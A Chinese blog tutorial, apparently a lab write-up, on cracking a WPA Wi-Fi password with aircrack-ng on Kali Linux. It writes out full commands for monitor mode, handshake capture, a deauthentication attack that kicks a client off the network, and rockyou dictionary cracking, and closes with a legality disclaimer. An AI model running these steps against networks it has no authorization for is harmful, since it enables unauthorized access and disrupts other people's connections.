环境准备: 一台kali Linux的虚拟机,一台win10的物理机
1) 打开 网卡的Monitor(监控)模式
> lsusb
在命令行运行 lsusb 查看当前系统的USB设备,因为我这里使用的是无线网卡,很明显第一个设备就是插入的网卡,网卡为Ralink类型,芯片为MT7601U,已经自动安装好驱动程序。
airmon-ng
运行 airmon-ng 命令,查看可支持开启Monitor模式的网卡,很明显这就是我们插入的Ralink网卡。
airmon-ng start wlan0
开启监控模式,这里的wlano就是使用airmon-ng 查看得到的Interface名字
开启监控模式后wlan0这个设备就会变为wlan0mon,网卡的工作模式也变为Monitor 可以使用iwconfig查看下。
2) 当前当前环境下的WIFI网络
airodump-ng wlan0mon
我们此次试验破解的WIFI名称为TP-LINK_C4E7
- BSSID是AP端的MAC地址
- PWR是信号强度,数字越小越好
- Data是对应的路由器的在线数据吞吐量,数字越大,数据上传量越大。
- CH是对应路由器的所在频道
- ESSID是对应路由器的名称
3)抓取握手包
当有新用户连接WIFI,或者断开WIFI中心连接的过程中会发送握手包,这是开启监控模式的网卡就可以抓取到这个握手包。
airodump-ng -c 11 –bssid F4:83:CD:C9:C4:E7 -w ~/ wlan0mon
- -c 指定频道号,这里是11
- -bssid 指定路由器的bssid这里是 F4:83:CD:C9:C4:E7
- -w 指定数据包的地址 ~/表示存放在/root路径下
这里的STATION就是当前连接到这个网络的电脑的MAC地址(就是我啦),在电脑的CMD命令行中出入 ipconfig/all 命令就可以查看本机MAC地址。
4) 强制连接到WIFI的用户重新连接WIFI。
这时我们可以等新用户使用密码连接(谁知道会不会有新用户连接(ㄒoㄒ)),时间是很宝贵的,所以我们要做的就是强制某个已连接的电脑断开WIFI并且重新连接(PS. 基本上无法察觉,只是会断网几秒钟),
aireplay-ng -deauth 2 -a F4:83:CD:C9:C4:E7 -c 38-B1-DB-FD-9B-23 wlan0mon
- -deauth 表示进行解除认证攻击(告诉已连接的电脑路由器不认识你了,需要你重新登录) 后面的2表示攻击的次数,如果为0表示无线攻击,被攻击的电脑就无法连接WIFI了(PS.尽量不要这么做)。
- -a 后面指定路由器的bssid,前面已经提到过
- -c 后面指定被攻击的电脑的MAC地址
攻击成功后抓包的界面就会显示
至此抓包过程就结束了,关闭网卡的Monitor模式
airmon-ng stop wlan0mon
5)破解密码
破解密码需要字典就和英语字典一样,kali本身就带有rockyou字典。这里我已经解压好了,第一次使用需要解压。
开始破解
aircrack-ng -a2 -b F4:83:CD:C9:C4:E7 -w /usr/share/wordlists/rockyou.txt ~/*.cap
- -b 后面指定路由器的bssid
- -w 指定字典位置 在后面跟抓到的包
破解完毕,因为密码超级简单所以破解过程花了大概5s? (PS.这就是设密码的时候要设置复杂的原因ヽ( ̄▽ ̄)ノ)
Attention Please!!! 破解其他人的密码是一种”违法”的行为,此次破解的目的只是为证明设置密码要越复杂越好,绝无其它想法(( • ̀ω•́ )✧)。
更多推荐
记一次使用Aircrack"破解"实验室无线网密码
发布评论